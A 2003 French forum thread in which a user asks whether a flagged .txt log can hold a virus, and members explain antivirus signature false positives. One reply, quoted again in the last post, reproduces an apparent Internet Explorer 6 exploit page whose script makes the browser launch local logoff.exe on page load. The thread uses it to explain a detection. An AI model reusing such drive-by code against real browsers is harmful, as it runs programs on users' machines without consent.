alerte virus zombie.17654.a.zcme

alerte virus zombie.17654.a.zcme - Sécurité - Windows & Software

Marsh Posté le 23-04-2003 à 23:51:33    

Bonsoir,
 
J'ai une alerte de mon antivirus me disant q'un fichier txt est infecté par "zombie.17654.a.zcme"
 
Je ne pensais pas qu'un fichier txt pouvait contenir un virus.
Est-ce vrai ou une fausse alerte?


Message édité par JEFLEFOU le 24-04-2003 à 00:11:26
Reply

Marsh Posté le 23-04-2003 à 23:51:33   

Reply

Marsh Posté le 24-04-2003 à 00:33:19    

si ton antivirus le dit, c'est surement un vrai...
ou alors c'est le poisson d'avril commun et en retard des éditeurs d'antivirus...

Reply

Marsh Posté le 24-04-2003 à 00:43:28    

le pb c'est que je viens de passer 3 antivirus en ligne et aucun ne le détecte.
 
Je suis en train de mettre à jour mon antivirus et je vais lancer un nouveau scan.


Message édité par JEFLEFOU le 24-04-2003 à 00:45:21
Reply

Marsh Posté le 24-04-2003 à 00:44:26    

c'est quoi ton antivirus ?
T'as regardé sur le net ce qui st dit sur ce virus ?

Reply

Marsh Posté le 24-04-2003 à 00:45:05    

Tu sais ,les antivirus en ligne c'est pas très fiable

Reply

Marsh Posté le 24-04-2003 à 00:45:53    

/me smell a fake :D

Reply

Marsh Posté le 24-04-2003 à 00:47:16    

Antivirus kit pro version 11.
 
J'ai rien trouvé de particulier sur ce virus qui me soit compréhensible. Il est répertorié comme un virus "dos".

Reply

Marsh Posté le 24-04-2003 à 00:48:11    

weebbeep a écrit :

/me smell a fake :D


 
Tu crois que j'ai que ça à faire à cette heure-ci que de balancer un fake.

Reply

Marsh Posté le 24-04-2003 à 00:49:49    

From Hell a écrit :

Tu sais ,les antivirus en ligne c'est pas très fiable


Je veux bien mais j'en ai quand même essayé trois différents.
 
J'attends le résultat du scan en cours.

Reply

Marsh Posté le 24-04-2003 à 00:50:33    

Tu effaces le fichier en question et pis voila, fin de l'alerte !

Reply

Marsh Posté le 24-04-2003 à 00:50:33   

Reply

Marsh Posté le 24-04-2003 à 00:52:40    

From Hell a écrit :

Tu effaces le fichier en question et pis voila, fin de l'alerte !


C'est bien ce que j'aurais fait mais je n'ai pas de copie de ce fichier et j'en ai besoin.

Reply

Marsh Posté le 24-04-2003 à 00:54:01    

Et ba ouvre le tu verras ce qui vas t'arriver...
Si on te voit plus poster dans 2 minutes c'est que le virus t'auras pété au visage.... :D

Reply

Marsh Posté le 24-04-2003 à 01:06:30    

Résultat du nouveau scan, il n'a rien détecté  cette fois. :??:  
 
Pourtant dans le rapport d'alerte, il m'a mis :
 
"While Fermer of the file "C:\docs\log.txt" the virus "Zombie.17654.A:ZCME" has been detected by engine "RAV-Engine". File disinfected: Non. File deleted: Non. Quarantine: Non."


Message édité par JEFLEFOU le 24-04-2003 à 01:11:03
Reply

Marsh Posté le 24-04-2003 à 01:16:42    

fait gaffe il se serre peut etre d'une faille de sécurité de notepad :D

Reply

Marsh Posté le 24-04-2003 à 01:23:46    

weebbeep a écrit :

fait gaffe il se serre peut etre d'une faille de sécurité de notepad :D


Arrête de faire le malin. C'est la deuxième fois qu'il me fait une alerte sur le même fichier en 2 jours. La première fois s'était par un troyen.
 
J'ai téléchargé plusieurs antitroyen par sécurité qui n'ont rien détecté.
 
Vu que ce sont des logs, je me demande s'il ne crée pas une fausse alerte chaque fois que le soft met à jour le fichier.

Reply

Marsh Posté le 24-04-2003 à 14:23:44    

surement que ton antivirus a scanné tous les types de fichiers, et a reconnu la signature d'un virus dans le fichier .txt, alors que les autres antivirus n'ont pas scanné les fichiers .txt (inoffensifs tant que leur extension n'est pas changée) ou ne sont pas basés sur la même signature pour ce virus.

Reply

Marsh Posté le 24-04-2003 à 16:35:45    

BlackGoddess a écrit :

surement que ton antivirus a scanné tous les types de fichiers, et a reconnu la signature d'un virus dans le fichier .txt, alors que les autres antivirus n'ont pas scanné les fichiers .txt (inoffensifs tant que leur extension n'est pas changée) ou ne sont pas basés sur la même signature pour ce virus.


 
Je ne comprends pas pourquoi il ne le redétecte pas lors du second scan après la mise à jour.
 
"While Fermer of the file "C:\docs\log.txt" the virus "Zombie.17654.A:ZCME" has been detected by engine "RAV-Engine". File disinfected: Non. File deleted: Non. Quarantine: Non."
 
A priori il n'a pas touché au fichier donc il devrait le retrouver.

Reply

Marsh Posté le 24-04-2003 à 18:24:53    

Je ne comprends plus rien, il vient de me le redétecter.
 
 :cry:

Reply

Marsh Posté le 24-04-2003 à 19:24:24    

C'est le log de quoi ton fichier ?
Il est possible qu'il s'y trouve une chaine de caractères correspondant à un virus.
J'avais le même problème en évaluant ton antivirus.
J'ai ouvert le fichier avec notepad et il y avait une page HTML que j'avais du sauvegarder un jour.
La voilà:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
 
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
 
var programName=new Array(
        'c:/windows/system32/logoff.exe',
        'c:/winxp/system32/logoff.exe',
        'c:/winnt/system32/logoff.exe'
);
 
function Init(){
        var oPopup=window.createPopup();
        var oPopBody=oPopup.document.body;
        var n,html='';
        for(n=0;n<programName.length;n++)
                html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
        oPopBody.innerHTML=html;
        oPopup.show(290, 390, 200, 200, document.body);
}
 
</SCRIPT>
</head>
<BODY onload="Init()">
------
Tu peux faire un copier/coller dans un fichiet toto.txt et le scanner pour voir.
Cet AV est un peu trop parano à mon goût  :D  
 
 [:clweb]  
 


---------------
@+ , Claude
Reply

Marsh Posté le 24-04-2003 à 19:46:30    

clweb a écrit :

C'est le log de quoi ton fichier ?
Il est possible qu'il s'y trouve une chaine de caractères correspondant à un virus.
J'avais le même problème en évaluant ton antivirus.
J'ai ouvert le fichier avec notepad et il y avait une page HTML que j'avais du sauvegarder un jour.
La voilà:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
 
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
 
var programName=new Array(
        'c:/windows/system32/logoff.exe',
        'c:/winxp/system32/logoff.exe',
        'c:/winnt/system32/logoff.exe'
);
 
function Init(){
        var oPopup=window.createPopup();
        var oPopBody=oPopup.document.body;
        var n,html='';
        for(n=0;n<programName.length;n++)
                html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
        oPopBody.innerHTML=html;
        oPopup.show(290, 390, 200, 200, document.body);
}
 
</SCRIPT>
</head>
<BODY onload="Init()">
------
Tu peux faire un copier/coller dans un fichiet toto.txt et le scanner pour voir.
Cet AV est un peu trop parano à mon goût  :D  
 
 [:clweb]  
 
 


Je viens d'essayer avec ton .txt.
 
J'ai un message indiquant virus probable.
Ca confirme ce que je pensais, il est trop sensible.
Je préfère encore  ça que l'inverse.
 
Merci


Message édité par JEFLEFOU le 24-04-2003 à 19:47:32
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed